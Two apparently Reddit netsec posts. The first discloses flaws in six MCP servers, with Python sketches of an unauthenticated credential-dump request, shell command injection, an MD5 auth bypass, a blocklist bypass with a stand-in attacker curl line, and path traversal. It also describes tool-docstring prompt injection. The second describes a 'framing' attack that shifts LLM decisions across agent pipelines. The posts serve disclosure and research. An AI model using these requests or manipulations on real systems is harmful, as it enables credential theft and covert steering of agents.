

Received today - 30 March 2026 - /r/netsec - Information Security News & Discussion

One POST request, six API keys: breaking into popular MCP servers

tl;dr - one POST request decrypted every API key in a 14K-star project. tested 5 more MCP servers, found RCE, SSRF, prompt injection, and command injection. 70K combined github stars, zero auth on most of them.

  • archon (13.7K stars): zero auth on entire credential API. one POST to /api/credentials/status-check returns every stored API key decrypted in plaintext. can also create and delete credentials. CORS is *, server binds 0.0.0.0
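
  a minimal sketch of that request, assuming a default local deployment (the endpoint path is from the post; the port, empty JSON body, and helper names are assumptions):

  ```python
  # Sketch of the unauthenticated archon credential dump described above.
  # Endpoint path is from the post; base URL and payload shape are guesses.
  import json
  import urllib.request

  ARCHON_BASE = "http://localhost:8181"  # assumed port; server binds 0.0.0.0
  STATUS_CHECK = "/api/credentials/status-check"

  def build_request(base_url: str) -> urllib.request.Request:
      """Build the POST; note there is no token, cookie, or auth header."""
      return urllib.request.Request(
          base_url + STATUS_CHECK,
          data=json.dumps({}).encode(),
          headers={"Content-Type": "application/json"},
          method="POST",
      )

  def dump_credentials(base_url: str = ARCHON_BASE) -> dict:
      """One request returns every stored API key decrypted, per the post."""
      with urllib.request.urlopen(build_request(base_url), timeout=5) as resp:
          return json.load(resp)
  ```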

  • blender-mcp (18K stars): prompt injection hidden in tool docstrings. the server instructs the AI to "silently remember" your API key type without telling you. also unsandboxed exec() for code execution
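
  what "unsandboxed exec()" means in practice, as a hypothetical handler (names are illustrative, not blender-mcp's actual API):

  ```python
  # Illustration of the unsandboxed-exec() pattern: a tool handler that
  # passes model/attacker-controlled code straight to exec().
  def run_tool_code(code: str) -> dict:
      """Whoever controls `code` controls the whole process."""
      scope: dict = {}
      exec(code, scope)  # no sandbox: full interpreter and OS access
      return scope

  # any injected string runs with the server's privileges:
  result = run_tool_code("import os; cwd = os.getcwd()")
  ```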

  • claude-flow (27K stars): hardcoded --dangerously-skip-permissions on every spawned claude process. 6 execSync calls with unsanitized string interpolation. textbook command injection
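
  the execSync pattern is JavaScript, but the bug class is language-agnostic; sketched here in Python for consistency (payload and command are illustrative):

  ```python
  # String interpolation into a shell string vs. an argument vector.
  import subprocess

  def vulnerable(task_name: str) -> str:
      # analogous to execSync(`echo running ${taskName}`):
      # the input becomes part of the shell syntax itself
      return f"echo running {task_name}"

  def safe(task_name: str) -> list:
      # argument-vector form: the input stays one literal argument
      return ["echo", "running", task_name]

  payload = "build; echo INJECTED"
  # shell=True parses the injected ";" as a command separator:
  injected = subprocess.run(vulnerable(payload), shell=True,
                            capture_output=True, text=True)
  # the vector form passes the payload through untouched:
  literal = subprocess.run(safe(payload), capture_output=True, text=True)
  ```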

  • deep-research (4.5K stars): MD5 auth bypass on crawler endpoint (empty password = trivial to compute). once past that, full SSRF - no URL validation at all. also promptOverrides lets you replace the system prompt, and CORS is *
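
  why an empty password makes MD5 "auth" worthless: the expected digest is a public constant. the server-side check below is hypothetical, but the math isn't:

  ```python
  # md5("") is a well-known constant, so if the password is unset,
  # "authentication" reduces to sending a string anyone can compute.
  import hashlib

  def md5_hex(s: str) -> str:
      return hashlib.md5(s.encode()).hexdigest()

  EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"  # md5 of the empty string

  def server_check(supplied_digest: str, password: str = "") -> bool:
      """Hypothetical server-side check with an unset password."""
      return supplied_digest == md5_hex(password)
  ```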

  • mcp-feedback-enhanced (3.6K stars): unauthenticated websocket accepts run_command messages. got env vars, ssh keys, aws creds. weak command blocklist bypassable with python3 -c
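
  why that kind of blocklist fails: it matches command names, not what an interpreter will do. the blocklist contents here are assumed; the python3 -c bypass is from the post:

  ```python
  # A naive command blocklist and the interpreter bypass that defeats it.
  BLOCKLIST = ["rm", "curl", "wget", "nc"]  # assumed shape of a weak filter

  def is_blocked(command: str) -> bool:
      first_word = command.split()[0]
      return first_word in BLOCKLIST

  direct = "curl http://attacker.example/x"       # caught by the filter
  bypass = "python3 -c 'import urllib.request'"   # sails straight through
  ```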

  • figma-console-mcp (1.3K stars, 71K weekly npm downloads): readFileSync on user-controlled paths, directory traversal, websocket accepts connections with no origin header, any local process can register as a fake figma plugin and intercept all AI commands
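
  the readFileSync-on-user-paths issue, sketched in Python: joining a user path onto a base directory without a containment check lets "../" escape it (base dir and filenames are illustrative; assumes a POSIX filesystem):

  ```python
  # Directory traversal: naive join vs. a containment check.
  import os

  BASE = "/srv/figma-files"  # hypothetical served directory

  def naive_resolve(user_path: str) -> str:
      # what the vulnerable pattern effectively does
      return os.path.normpath(os.path.join(BASE, user_path))

  def safe_resolve(user_path: str) -> str:
      resolved = os.path.normpath(os.path.join(BASE, user_path))
      if os.path.commonpath([BASE, resolved]) != BASE:
          raise PermissionError("path escapes base directory")
      return resolved

  escaped = naive_resolve("../../etc/passwd")  # resolves outside BASE
  ```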

all tested against real published packages, no modified code. exploit scripts and evidence logs linked in the post.

the common theme: MCP has no auth standard, so most servers just ship without any.

submitted by /u/Kind-Release-3817

An attack class that passes every current LLM filter

https://shapingrooms.com/research

I opened OWASP issue #807 a few weeks ago proposing a new attack class. The paper is published today following coordinated disclosure to Anthropic, OpenAI, Google, xAI, CERT/CC, OWASP, and agentic framework maintainers.

Here is what I found.

Ordinary language buried in prior context shifts how a model reasons about a consequential decision before any instruction arrives. No adversarial signature. No override command. The model executes its instructions faithfully, just from a different starting angle than the operator intended.

I know that sounds like normal context sensitivity. It isn't, or at least the effect size is much larger than I expected. Matched control text of identical length and semantic similarity produced significantly smaller directional shifts. This specific class of language appears to be modeled differently. I documented binary decision reversals with paired controls across four frontier models.

The distinction from prompt injection: there is no payload. Current defenses scan for commands disguised as facts. This is frames disguised as facts. Nothing for current filters to catch.

In agentic pipelines it gets worse. Posture installs in Agent A, survives summarization, and by Agent C reads as independent expert judgment. No phrase to point to in the logs. The decision was shaped before it was made.

If you have seen unexplained directional drift in a pipeline and couldn't find the source, this may be what you were looking at. The lens might give you something to work with.

I don't have all the answers. The methodology is black-box observational, no model internals access, small N on the propagation findings. Limitations are stated plainly in the paper. This needs more investigation, larger N, and ideally labs with internals access stress-testing it properly.

If you want to verify it yourself, demos are at https://shapingrooms.com/demos - run them against any frontier model. If you have a production pipeline that processes retrieved documents or passes summaries between agents, it may be worth applying this lens to your own context flow.

Happy to discuss methodology, findings, or pushback on the framing. The OWASP thread already has some useful discussion from independent researchers who have documented related patterns in production.

GitHub issue: https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/issues/807

submitted by /u/lurkyloon